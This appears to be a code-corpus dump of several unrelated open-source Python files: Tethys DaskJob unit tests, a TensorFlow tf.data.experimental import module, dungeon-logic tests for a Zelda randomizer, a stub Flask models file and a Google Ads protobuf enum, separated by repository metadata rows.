mock_future.side_effect = Exception('exception in creating future')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
future = client.submit(inc, 1)
djob.key = future.key
ret = djob.future
self.assertIsNone(ret)
mock_log.exception.assert_called_with('Dask Future Init Error')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_delayed(self, mock_client, mock_save, mock_ff):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_future = mock.MagicMock(key='test_key')
mock_client_ret.compute.return_value = mock_future
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
delayed = dask.delayed(inc)(1)
djob._execute(delayed)
mock_client_ret.compute.assert_called_with(delayed)
self.assertEqual('test_key', djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(mock_future)
@mock.patch('tethys_compute.models.dask.dask_job.isinstance')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_future(self, mock_client, mock_save, mock_ff, mock_isinstance):
mock_client.return_value = mock.MagicMock()
mock_isinstance.side_effect = [True, False]
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
client = djob.client
future = client.submit(inc, 2)
djob._execute(future)
self.assertEqual(future.key, djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(future)
def test_execute_not_future_delayed(self):
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
self.assertRaises(ValueError, djob._execute, 1)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status(self, mock_future, mock_save, mock_client):
mock_future.status = 'finished'
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
djob._update_status()
mock_client.close.assert_called()
mock_save.assert_called()
def test_update_status_with_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob._update_status())
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status_exception(self, mock_future, mock_save, mock_log):
mock_future.status = 'foo'
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
djob._update_status()
mock_log.error.assert_called_with('Unknown Dask Status: "foo"')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_failed_lock(self, mock_re_lock, mock_apl):
mock_apl.return_value = False
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
self.assertIsNone(djob._process_results())
mock_re_lock.assert_not_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock(return_value=None))
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
def test_process_result_no_future(self, mock_apl, _):
mock_apl.return_value = True
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
self.assertIsNone(djob._process_results())
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock())
def test_process_result_forget(self, _, mock_client):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler, forget=True)
ret = djob._process_results()
mock_client.close.assert_called()
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function(self, mock_re_lock, mock_apl, mock_client, mock_future, mock_tfe):
fake_key = 'sum_faef'
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
djob.key = fake_key
djob._process_results()
mock_client.close.assert_called()
mock_client.gather.assert_called_with(mock_future)
mock_function.assert_called_with(mock_client.gather())
mock_client.set_metadata.assert_called_with(fake_key, False)
self.assertEqual('', djob.key)
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_process_result_with_client_gather_exception(self, mock_logger, mock_re_lock, mock_apl, mock_client,
mock_future, mock_tfe):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
gather_exception = Exception('Fake exception')
mock_client.gather.side_effect = gather_exception
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
djob._process_results()
mock_client.gather.assert_called_with(mock_future)
mock_logger.warning.assert_called()
mock_function.assert_called_with(gather_exception)
mock_re_lock.assert_called()
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function_with_exception(self, mock_re_lock, mock_apl, _, mock_client,
mock_tfe, mock_log, mock_save):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock()
mock_function.side_effect = Exception
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
djob._process_results()
mock_log.exception.assert_called_with('Process Results Function Error')
self.assertEqual('ERR', djob._status)
mock_save.assert_called()
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_stop(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.stop()
mock_future.cancel.assert_called()
def test_pause(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
self.assertRaises(NotImplementedError, djob.pause)
def test_resume(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
self.assertRaises(NotImplementedError, djob.resume)
def test_result(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.result = 'serialized_results'
ret = djob.result
self.assertEqual('serialized_results', ret)
def test_result_none(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.result = None
ret = djob.result
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_done(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
ret = djob.done()
mock_future.done.assert_called()
self.assertEqual(mock_future.done(), ret)
def test_done_with_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob.done())
def test_update_status_interval_prop(self):
from datetime import timedelta
djob = DaskJob(name='test_daskjob', user=self.user, label='label')
djob.save()
ret = DaskJob.objects.get(name='test_daskjob').update_status_interval
self.assertIsInstance(ret, timedelta)
self.assertEqual(timedelta(0, 0), ret)
djob.delete()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_retry(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.retry()
mock_future.retry.assert_called()
def test_retry_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob.retry())
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_fail_acquire_pr_lock(self, mock_log):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.extended_properties['processing_results'] = True
self.assertFalse(djob._acquire_pr_lock())
mock_log.warning.assert_called_with('Unable to aquire lock. Processing results already occurring. Skipping...')
@mock.patch('django.db.models.base.Model.save')
def test_fail_release_pr_lock(self, mock_save):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.extended_properties['processing_results'] = True
djob._release_pr_lock()
self.assertFalse(djob.extended_properties['processing_results'])
mock_save.assert_called()
| true | true |
f7103a621ee09bad322a5add73d81308b6b2be8c | 6,345 | py | Python | tensorflow/python/data/experimental/__init__.py | Sonata-Wang/tensorflow | 8bbef0cd77879d05ed69bf30e76087847a8ca4a2 | [
"Apache-2.0"
] | 6 | 2019-02-05T22:36:51.000Z | 2022-01-14T03:50:57.000Z | tensorflow/python/data/experimental/__init__.py | dipu989/tensorflow | 3e21fe5faedab3a8258d344c8ad1cec2612a8aa8 | [
"Apache-2.0"
] | 1 | 2019-09-14T04:40:07.000Z | 2020-11-18T18:16:17.000Z | tensorflow/python/data/experimental/__init__.py | dipu989/tensorflow | 3e21fe5faedab3a8258d344c8ad1cec2612a8aa8 | [
"Apache-2.0"
] | 8 | 2016-01-14T13:12:56.000Z | 2021-04-09T10:20:53.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Experimental API for building input pipelines.
This module contains experimental `Dataset` sources and transformations that can
be used in conjunction with the `tf.data.Dataset` API. Note that the
`tf.data.experimental` API is not subject to the same backwards compatibility
guarantees as `tf.data`, but we will provide deprecation advice in advance of
removing existing functionality.
See [Importing Data](https://tensorflow.org/guide/datasets) for an overview.
@@Counter
@@CheckpointInputPipelineHook
@@CsvDataset
@@DatasetStructure
@@NestedStructure
@@OptimizationOptions
@@Optional
@@OptionalStructure
@@RandomDataset
@@Reducer
@@SparseTensorStructure
@@SqlDataset
@@StatsAggregator
@@StatsOptions
@@Structure
@@TFRecordWriter
@@TensorStructure
@@ThreadingOptions
@@bucket_by_sequence_length
@@bytes_produced_stats
@@cardinality
@@choose_from_datasets
@@copy_to_device
@@dense_to_sparse_batch
@@enumerate_dataset
@@filter_for_shard
@@get_next_as_optional
@@get_single_element
@@group_by_reducer
@@group_by_window
@@ignore_errors
@@latency_stats
@@make_batched_features_dataset
@@make_csv_dataset
@@make_saveable_from_iterator
@@map_and_batch
@@map_and_batch_with_legacy_function
@@parallel_interleave
@@parse_example_dataset
@@prefetch_to_device
@@rejection_resample
@@sample_from_datasets
@@scan
@@shuffle_and_repeat
@@take_while
@@unbatch
@@unique
@@AUTOTUNE
@@INFINITE_CARDINALITY
@@UNKNOWN_CARDINALITY
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.data.experimental.ops.batching import dense_to_sparse_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch_with_legacy_function
from tensorflow.python.data.experimental.ops.batching import unbatch
from tensorflow.python.data.experimental.ops.cardinality import cardinality
from tensorflow.python.data.experimental.ops.cardinality import INFINITE as INFINITE_CARDINALITY
from tensorflow.python.data.experimental.ops.cardinality import UNKNOWN as UNKNOWN_CARDINALITY
from tensorflow.python.data.experimental.ops.counter import Counter
from tensorflow.python.data.experimental.ops.enumerate_ops import enumerate_dataset
from tensorflow.python.data.experimental.ops.error_ops import ignore_errors
from tensorflow.python.data.experimental.ops.filter_for_shard_ops import filter_for_shard
from tensorflow.python.data.experimental.ops.get_single_element import get_single_element
from tensorflow.python.data.experimental.ops.grouping import bucket_by_sequence_length
from tensorflow.python.data.experimental.ops.grouping import group_by_reducer
from tensorflow.python.data.experimental.ops.grouping import group_by_window
from tensorflow.python.data.experimental.ops.grouping import Reducer
from tensorflow.python.data.experimental.ops.interleave_ops import choose_from_datasets
from tensorflow.python.data.experimental.ops.interleave_ops import parallel_interleave
from tensorflow.python.data.experimental.ops.interleave_ops import sample_from_datasets
from tensorflow.python.data.experimental.ops.iterator_ops import CheckpointInputPipelineHook
from tensorflow.python.data.experimental.ops.iterator_ops import make_saveable_from_iterator
from tensorflow.python.data.experimental.ops.optimization import AUTOTUNE
from tensorflow.python.data.experimental.ops.optimization_options import OptimizationOptions
from tensorflow.python.data.experimental.ops.parsing_ops import parse_example_dataset
from tensorflow.python.data.experimental.ops.prefetching_ops import copy_to_device
from tensorflow.python.data.experimental.ops.prefetching_ops import prefetch_to_device
from tensorflow.python.data.experimental.ops.random_ops import RandomDataset
from tensorflow.python.data.experimental.ops.readers import CsvDataset
from tensorflow.python.data.experimental.ops.readers import make_batched_features_dataset
from tensorflow.python.data.experimental.ops.readers import make_csv_dataset
from tensorflow.python.data.experimental.ops.readers import SqlDataset
from tensorflow.python.data.experimental.ops.resampling import rejection_resample
from tensorflow.python.data.experimental.ops.scan_ops import scan
from tensorflow.python.data.experimental.ops.shuffle_ops import shuffle_and_repeat
from tensorflow.python.data.experimental.ops.stats_aggregator import StatsAggregator
from tensorflow.python.data.experimental.ops.stats_ops import bytes_produced_stats
from tensorflow.python.data.experimental.ops.stats_ops import latency_stats
from tensorflow.python.data.experimental.ops.stats_options import StatsOptions
from tensorflow.python.data.experimental.ops.take_while_ops import take_while
from tensorflow.python.data.experimental.ops.threading_options import ThreadingOptions
from tensorflow.python.data.experimental.ops.unique import unique
from tensorflow.python.data.experimental.ops.writers import TFRecordWriter
from tensorflow.python.data.ops.dataset_ops import DatasetStructure
from tensorflow.python.data.ops.iterator_ops import get_next_as_optional
from tensorflow.python.data.ops.optional_ops import Optional
from tensorflow.python.data.ops.optional_ops import OptionalStructure
from tensorflow.python.data.util.structure import NestedStructure
from tensorflow.python.data.util.structure import SparseTensorStructure
from tensorflow.python.data.util.structure import Structure
from tensorflow.python.data.util.structure import TensorStructure
# pylint: enable=unused-import
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 45.647482 | 96 | 0.849173 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.experimental.ops.batching import dense_to_sparse_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch_with_legacy_function
from tensorflow.python.data.experimental.ops.batching import unbatch
from tensorflow.python.data.experimental.ops.cardinality import cardinality
from tensorflow.python.data.experimental.ops.cardinality import INFINITE as INFINITE_CARDINALITY
from tensorflow.python.data.experimental.ops.cardinality import UNKNOWN as UNKNOWN_CARDINALITY
from tensorflow.python.data.experimental.ops.counter import Counter
from tensorflow.python.data.experimental.ops.enumerate_ops import enumerate_dataset
from tensorflow.python.data.experimental.ops.error_ops import ignore_errors
from tensorflow.python.data.experimental.ops.filter_for_shard_ops import filter_for_shard
from tensorflow.python.data.experimental.ops.get_single_element import get_single_element
from tensorflow.python.data.experimental.ops.grouping import bucket_by_sequence_length
from tensorflow.python.data.experimental.ops.grouping import group_by_reducer
from tensorflow.python.data.experimental.ops.grouping import group_by_window
from tensorflow.python.data.experimental.ops.grouping import Reducer
from tensorflow.python.data.experimental.ops.interleave_ops import choose_from_datasets
from tensorflow.python.data.experimental.ops.interleave_ops import parallel_interleave
from tensorflow.python.data.experimental.ops.interleave_ops import sample_from_datasets
from tensorflow.python.data.experimental.ops.iterator_ops import CheckpointInputPipelineHook
from tensorflow.python.data.experimental.ops.iterator_ops import make_saveable_from_iterator
from tensorflow.python.data.experimental.ops.optimization import AUTOTUNE
from tensorflow.python.data.experimental.ops.optimization_options import OptimizationOptions
from tensorflow.python.data.experimental.ops.parsing_ops import parse_example_dataset
from tensorflow.python.data.experimental.ops.prefetching_ops import copy_to_device
from tensorflow.python.data.experimental.ops.prefetching_ops import prefetch_to_device
from tensorflow.python.data.experimental.ops.random_ops import RandomDataset
from tensorflow.python.data.experimental.ops.readers import CsvDataset
from tensorflow.python.data.experimental.ops.readers import make_batched_features_dataset
from tensorflow.python.data.experimental.ops.readers import make_csv_dataset
from tensorflow.python.data.experimental.ops.readers import SqlDataset
from tensorflow.python.data.experimental.ops.resampling import rejection_resample
from tensorflow.python.data.experimental.ops.scan_ops import scan
from tensorflow.python.data.experimental.ops.shuffle_ops import shuffle_and_repeat
from tensorflow.python.data.experimental.ops.stats_aggregator import StatsAggregator
from tensorflow.python.data.experimental.ops.stats_ops import bytes_produced_stats
from tensorflow.python.data.experimental.ops.stats_ops import latency_stats
from tensorflow.python.data.experimental.ops.stats_options import StatsOptions
from tensorflow.python.data.experimental.ops.take_while_ops import take_while
from tensorflow.python.data.experimental.ops.threading_options import ThreadingOptions
from tensorflow.python.data.experimental.ops.unique import unique
from tensorflow.python.data.experimental.ops.writers import TFRecordWriter
from tensorflow.python.data.ops.dataset_ops import DatasetStructure
from tensorflow.python.data.ops.iterator_ops import get_next_as_optional
from tensorflow.python.data.ops.optional_ops import Optional
from tensorflow.python.data.ops.optional_ops import OptionalStructure
from tensorflow.python.data.util.structure import NestedStructure
from tensorflow.python.data.util.structure import SparseTensorStructure
from tensorflow.python.data.util.structure import Structure
from tensorflow.python.data.util.structure import TensorStructure
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| true | true |
f7103cf22159d3ede9a65e78e17f06013e656af4 | 4,661 | py | Python | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | null | null | null | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | 5 | 2020-01-18T21:10:46.000Z | 2020-01-25T20:58:19.000Z | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | 2 | 2020-01-18T17:36:50.000Z | 2020-01-22T16:52:08.000Z | from test.dungeons.TestDungeon import TestDungeon
class TestSkullWoods(TestDungeon):
def testSkullWoodsFrontAllEntrances(self):
self.starting_regions = ['Skull Woods First Section', 'Skull Woods First Section (Left)', 'Skull Woods First Section (Top)']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsFrontOnly(self):
self.starting_regions = ['Skull Woods First Section']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsLeftOnly(self):
self.starting_regions = ['Skull Woods First Section (Left)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", False, []],
["Skull Woods - Map Chest", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsBackOnly(self):
self.starting_regions = ['Skull Woods First Section (Top)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsMiddle(self):
self.starting_regions = ['Skull Woods Second Section']
self.remove_exits = ['Skull Woods Second Section Exit (East)', 'Skull Woods Second Section Exit (West)']
self.run_tests([["Skull Woods - Big Key Chest", True, []]])
def testSkullWoodsBack(self):
self.starting_regions = ['Skull Woods Final Section (Entrance)']
self.run_tests([
["Skull Woods - Bridge Room", True, []],
["Skull Woods - Boss", False, []],
["Skull Woods - Boss", False, [], ['Fire Rod']],
["Skull Woods - Boss", False, [], ['Progressive Sword']],
["Skull Woods - Boss", False, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Boss", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Fire Rod', 'Progressive Sword']],
]) | 47.080808 | 157 | 0.548809 | from test.dungeons.TestDungeon import TestDungeon
class TestSkullWoods(TestDungeon):
def testSkullWoodsFrontAllEntrances(self):
self.starting_regions = ['Skull Woods First Section', 'Skull Woods First Section (Left)', 'Skull Woods First Section (Top)']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsFrontOnly(self):
self.starting_regions = ['Skull Woods First Section']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsLeftOnly(self):
self.starting_regions = ['Skull Woods First Section (Left)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", False, []],
["Skull Woods - Map Chest", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsBackOnly(self):
self.starting_regions = ['Skull Woods First Section (Top)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsMiddle(self):
self.starting_regions = ['Skull Woods Second Section']
self.remove_exits = ['Skull Woods Second Section Exit (East)', 'Skull Woods Second Section Exit (West)']
self.run_tests([["Skull Woods - Big Key Chest", True, []]])
def testSkullWoodsBack(self):
self.starting_regions = ['Skull Woods Final Section (Entrance)']
self.run_tests([
["Skull Woods - Bridge Room", True, []],
["Skull Woods - Boss", False, []],
["Skull Woods - Boss", False, [], ['Fire Rod']],
["Skull Woods - Boss", False, [], ['Progressive Sword']],
["Skull Woods - Boss", False, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Boss", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Fire Rod', 'Progressive Sword']],
]) | true | true |
f7103e80a8ede0bdc771ecfc4ac8fc26714105f6 | 42 | py | Python | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | from . import db
# connect class user to | 14 | 24 | 0.714286 | from . import db
| true | true |
f7103ec2d4ba007ff5ea0a410b0557eaa6f6e7f4 | 1,153 | py | Python | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'SharedSetStatusEnum',
},
)
class SharedSetStatusEnum(proto.Message):
r"""Container for enum describing types of shared set statuses.
"""
class SharedSetStatus(proto.Enum):
r"""Enum listing the possible shared set statuses."""
UNSPECIFIED = 0
UNKNOWN = 1
ENABLED = 2
REMOVED = 3
__all__ = tuple(sorted(__protobuf__.manifest))
| 28.825 | 74 | 0.700781 |
import proto
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'SharedSetStatusEnum',
},
)
class SharedSetStatusEnum(proto.Message):
class SharedSetStatus(proto.Enum):
UNSPECIFIED = 0
UNKNOWN = 1
ENABLED = 2
REMOVED = 3
